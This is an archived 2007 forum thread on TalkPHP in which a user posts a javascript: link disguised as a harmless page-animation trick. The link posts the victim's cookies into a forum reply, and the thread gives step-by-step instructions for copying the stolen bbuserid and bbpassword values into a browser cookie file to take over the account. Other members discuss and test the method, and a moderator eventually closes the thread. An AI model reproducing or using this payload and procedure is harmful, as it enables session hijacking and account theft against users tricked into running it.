TalkPHP

TalkPHP (http://www.talkphp.com/forums.php)
-   The Lounge (http://www.talkphp.com/lounge/)
-   -   Never visit JS links on a forum, here is why (http://www.talkphp.com/lounge/1353-never-visit-js-links-forum-here-why.html)

Village Idiot 10-29-2007 02:14 AM

Never visit JS links on a forum, here is why
 
This sequence of things will allow you to hack a users account, with a little practice I was able to do it in about half a minute.

Step one: Make a thread like this one, it looks innocent (the code in that is), but use this code instead (WARNING: VISITING THIS WILL COMPROMISE YOUR ACCOUNT SECURITY).
PHP Code:

javascript:R=0x1=.1y1=.05x2=.25y2=.24x3=1.6y3=.24x4=300y4=200x5=300y5=200DI=document.getElementsByTagName("table"); DIL=DI.length; function A(){for(i=0i-DILi++){DIS=DI].styleDIS.position='absolute'DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}document.getElementById('vB_Editor_QR_textarea').value=document.cookie;document.getElementById('qr_submit').click();setInterval('A()',50); void(0); 

This code will print out all their cookies from this site.

Step 2:
You wait till some sucker runs the javascript, check often. When it gets posted, copy the text on notepad (not wordpad to remove all formatting) and close firefox

Step 3: If you use firefox, go to [Drive Letter]:\Documents and Settings\[User Name]\Application Data\Mozilla\Firefox\Profiles\[profile name]

Step 4: Edit the following values in cookies.txt with the ones on the notepad window (from the forum site, of course)
bbpassword
bbuserid

Save and close window, re-open firefox and you will be logged into their account.

I am working on a video for this, I will post it if I get it.

bluesaga 10-29-2007 10:34 AM

Interesting i Guess, im not sure if we condone this here and we may have to remove this topic. Hacking is hacking, whether you are advising people or not, this is showing people how to hack, not telling people how to not get caught.

obolus 10-29-2007 11:51 AM

errr... is this a joke? =o

Salathe 10-29-2007 12:33 PM

If a user is dumb enough to copy/paste the JS into their address bar and execute it, then you can have their account. :p On a more serious note, I don't see this as a problem since vBulletin just plain doesn't allow JavaScript to be injected anywhere. (that i know of)

Wildhoney 10-29-2007 01:21 PM

Quote:

*Blows a kiss to Wildhoney*
Such a classic.

cherries 10-29-2007 03:44 PM

you could just say it's the super popular javascript image "trick", it looks like it.

bluesaga 10-29-2007 04:07 PM

erm guys, try what he has said lol. Copy the code into your browser, and it will make a post with your cookie details, all you then need to do is create the cookies with the exact same information and you have access to the account...

It works, just make sure you delete the post after :D

Village Idiot 10-29-2007 08:42 PM

Quote:

Originally Posted by Salathe (Post 3470)
If a user is dumb enough to copy/paste the JS into their address bar and execute it, then you can have their account. :p On a more serious note, I don't see this as a problem since vBulletin just plain doesn't allow JavaScript to be injected anywhere. (that i know of)

Correct, I tried a number of different methods and the only one is to put it in your URL bar.

Tanax 10-29-2007 09:29 PM

Where will this "cookie" be posted? :|

Village Idiot 10-29-2007 11:35 PM

On the thread the person who runs it is on. I've tried to do redirections, but it didnt work.

cherries 10-30-2007 04:20 PM

Code:

bblastactivity=0; bblastvisit=1193694492;bbthread_lastview=hash-stufff-%lulz%xD
something along those lines.

Village Idiot 10-30-2007 04:44 PM

All you need is the user ID and encrypted password.

Sam Granger 11-13-2007 10:29 AM

*removes cookie info*

Village Idiot 11-13-2007 03:20 PM

I hope you know it isnt edited in the email for everyone who is subscribed to this thread.

Wildhoney 11-13-2007 03:38 PM

Lol :) He tells us after everybody has tried it. Good going, VI, good going! Very sneaky.

bluesaga 11-13-2007 03:39 PM

Due to the security issues related to a thread alike this, i have closed the topic. If you feel this should not have been done, please PM me.

Wildhoney 11-13-2007 03:45 PM

Good move. You probably want to log out and log back in for those who have tried this.


All times are GMT. The time now is 08:43 PM.

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.1.0